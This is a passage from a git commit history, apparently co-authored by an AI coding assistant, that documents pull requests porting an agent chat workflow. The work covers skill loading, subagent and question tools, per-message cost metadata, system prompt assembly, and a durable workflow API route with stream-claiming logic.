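  for (const line of match[1].split(/\r?\n/)) {
    const trimmed = line.trim();
    if (trimmed === "" || trimmed.startsWith("#")) continue; // skip blanks and comments
    const colon = line.indexOf(":"); // first colon only, so "https://..." survives
    if (colon <= 0) continue;
    const key = line.slice(0, colon).trim();
    const raw = line.slice(colon + 1).trim();
    const quoted =
      raw.length >= 2 &&
      ((raw.startsWith('"') && raw.endsWith('"')) || (raw.startsWith("'") && raw.endsWith("'")));
    if (quoted) result[key] = raw.slice(1, -1);
    else if (raw === "true" || raw === "false") result[key] = raw === "true";
    else result[key] = raw;
  }
  return result;
}

// Literal replacement of every `$ARGUMENTS` occurrence.
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}
```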
Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }` and registers the skill tool when non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects the sandbox + runs discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at `${workingDirectory}/skills/`, a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):
- `${workingDirectory}/.claude/skills/` (project, claude-style)
- `${workingDirectory}/.agents/skills/` (project, agents-style)
- `${HOME}/.agents/skills/` (global; populated at provisioning by installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands.
Changes:
- getSandboxSkillDirectories is now async (uses resolveSandboxHomeDirectory to find the sandbox's actual `$HOME`; defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + `$HOME` variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents, proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup; org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array.
2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit:
- Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
- Agent invoked `skill({ skill: "recoup-api" })` successfully and received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header

Full suite 3055/3055; lint clean; production build succeeds.
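The single-path result can be sketched as two tiny functions. Assumptions: the sandbox home directory has already been resolved (in api that is `resolveSandboxHomeDirectory`'s job, and the real `getSandboxSkillDirectories` is async; here the home is just a parameter), an empty value falls back to `/root` as the earlier commit describes, and the "trailing-slash tolerance" tested in the follow-up SRP commit is read as stripping trailing slashes before joining.

```typescript
const DEFAULT_SANDBOX_HOME = "/root"; // fallback described for resolveSandboxHomeDirectory

// `${HOME}/.agents/skills`, tolerating a trailing slash on HOME.
function getGlobalSkillsDirectory(homeDirectory: string): string {
  return `${homeDirectory.replace(/\/+$/, "")}/.agents/skills`;
}

// YAGNI: global skills only, no project-level directories.
function getSandboxSkillDirectories(resolvedHome: string | undefined): string[] {
  const home = resolvedHome?.trim() || DEFAULT_SANDBOX_HOME;
  return [getGlobalSkillsDirectory(home)];
}
```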
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite:
- lib/skills/findSkillFile.ts: was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts: was inlined in getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts): client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool-call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts): slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-`streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent.
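One way to express the curated subagent tool set is an explicit allowlist applied to the parent's tool record, so `task` (and any tool added later) is excluded by default rather than by remembering to omit it. This is a hypothetical sketch: the tool-record key names are assumed to match the names listed above, and the real `buildSubagentTools.ts` may construct its record directly instead of filtering the parent's.

```typescript
// Allowlist mirroring the executor-style subagent: no task, ask_user_question,
// skill, todo_write, or web_fetch.
const SUBAGENT_TOOL_NAMES = ["read", "write", "edit", "grep", "glob", "bash"] as const;
type SubagentToolName = (typeof SUBAGENT_TOOL_NAMES)[number];

function buildSubagentTools<T>(
  parentTools: Record<string, T>,
): Partial<Record<SubagentToolName, T>> {
  const picked: Partial<Record<SubagentToolName, T>> = {};
  for (const name of SUBAGENT_TOOL_NAMES) {
    // Excluded by default: anything not on the list, including `task`, never reaches a subagent.
    if (name in parentTools) picked[name] = parentTools[name];
  }
  return picked;
}
```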
The subagent tool set deliberately EXCLUDES:
- task (recursion guard: open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with open-agents' subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, and don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. The handler populates it from chat.model_id or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError, surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:
- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId; it uses model: LanguageModel / subagentModel?: LanguageModel.
api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. 
Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. 
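The pointwise usage sum and the per-turn accumulation across finish-step parts can be sketched as follows. `Usage` is a simplified stand-in for the SDK's `LanguageModelUsage` (top-level counters only). `createTurnAccumulator` and the `FinishStep` event shape are hypothetical. Only the output field names come from the metadata shape listed above.

```typescript
// Simplified stand-in for LanguageModelUsage (assumption: top-level counters only).
interface Usage {
  inputTokens?: number;
  outputTokens?: number;
  totalTokens?: number;
}

// Pointwise sum: a field stays undefined only if it is undefined on both sides.
function addTokenCounts(a?: number, b?: number): number | undefined {
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

function addUsage(a: Usage, b: Usage): Usage {
  return {
    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
  };
}

// Hypothetical finish-step event; the real callback reads SDK stream parts.
interface FinishStep {
  usage: Usage;
  cost?: number;
  finishReason: string;
}

// A fresh closure per assistant turn, so totals never leak across turns.
function createTurnAccumulator(modelId: string) {
  let totalMessageUsage: Usage = {};
  let totalMessageCost: number | undefined;
  const stepFinishReasons: string[] = [];

  return (step: FinishStep) => {
    totalMessageUsage = addUsage(totalMessageUsage, step.usage);
    if (step.cost !== undefined) totalMessageCost = (totalMessageCost ?? 0) + step.cost;
    stepFinishReasons.push(step.finishReason);
    return {
      modelId,
      lastStepUsage: step.usage,
      totalMessageUsage,
      lastStepCost: step.cost,
      totalMessageCost,
      stepFinishReasons: [...stepFinishReasons],
    };
  };
}
```

Keeping missing counters as `undefined` instead of coercing them to 0 avoids reporting zero-token placeholders for fields the provider never sent.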
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. 
Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597) * feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7) Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn. Production verification (today, before this fix): agent: "My system prompt does not contain working directory or branch information." 
After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits. Changes: - New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts). - New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution. - `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect). - `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly. Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either). Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore(chat-workflow): drop currentBranch handling from system prompt Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: <name>` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths). 
- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch) - Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering - Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged) - Remove branch-related test cases Can be re-added later if/when meaningful per-session branches (e.g. xx/abcdef12 generated branches) land. Tests: 3119/3119 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call Build failure on bf1e245 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
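After the branch handling was dropped, the prompt builder reduces to two parts: an optional Environment section, followed by the custom instructions, each included only when its input is present. This is a minimal sketch that assumes the heading and wording shown here. The PR does not quote the shipped prompt text.

```typescript
// Hypothetical sketch of buildAgentSystemPrompt({ cwd, customInstructions }).
// The Environment wording is an assumption, not the shipped text.
interface SystemPromptOptions {
  cwd?: string;
  customInstructions?: string;
}

function buildAgentSystemPrompt({ cwd, customInstructions }: SystemPromptOptions): string {
  const sections: string[] = [];
  if (cwd) {
    sections.push(
      ["## Environment", `Working directory: ${cwd}`, "Use workspace-relative paths where possible."].join("\n"),
    );
  }
  // Skip empty or whitespace-only custom instructions.
  if (customInstructions?.trim()) sections.push(customInstructions.trim());
  return sections.join("\n\n");
}
```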

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. 
Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. 
What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. 
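The `org-<slug>-<uuid>` → uuid mapping from extractOrgId can be sketched with a regular expression that is anchored at the end of the name. The PR only documents that mapping. Accepting a full clone URL with an optional `.git` suffix is an assumption here, based on the later note that the org id is derived from `session.clone_url`.

```typescript
// Hypothetical sketch: take the trailing UUID from an `org-<slug>-<uuid>` name
// (optionally the last segment of a clone URL ending in `.git`) and lowercase it.
// Returns null when no such segment exists.
const ORG_ID_PATTERN =
  /org-[a-z0-9-]+?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?:\.git)?\/?$/i;

function extractOrgId(value: string): string | null {
  const match = ORG_ID_PATTERN.exec(value.trim());
  return match ? match[1].toLowerCase() : null;
}
```

The slug character class excludes `/`, so a match is confined to the last path segment.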
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). 
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred-rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result.
Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. 
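The where-map split from the build fix can be sketched as a pure partition step. `splitWhere` is a hypothetical name. It only prepares the two inputs: the non-null entries are meant for a single `.match(obj)` call, and each null entry is meant for `.is(column, null)` on the Supabase query builder. The query calls themselves are omitted.

```typescript
// Hypothetical partition of a `where` map into equality matches and IS NULL columns.
type WhereValue = string | number | boolean | null | undefined;

function splitWhere(where: Record<string, WhereValue>): {
  matches: Record<string, string | number | boolean>;
  nullColumns: string[];
} {
  const matches: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === undefined) continue; // absent key: no predicate at all
    if (value === null) nullColumns.push(column); // becomes `column IS NULL`
    else matches[column] = value; // becomes `column = value`
  }
  return { matches, nullColumns };
}
```

Because the builder is built from one `.match()` call plus a short list of `.is()` calls, the code no longer reassigns a single query variable inside a loop, which was the pattern that triggered the deep type instantiation.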
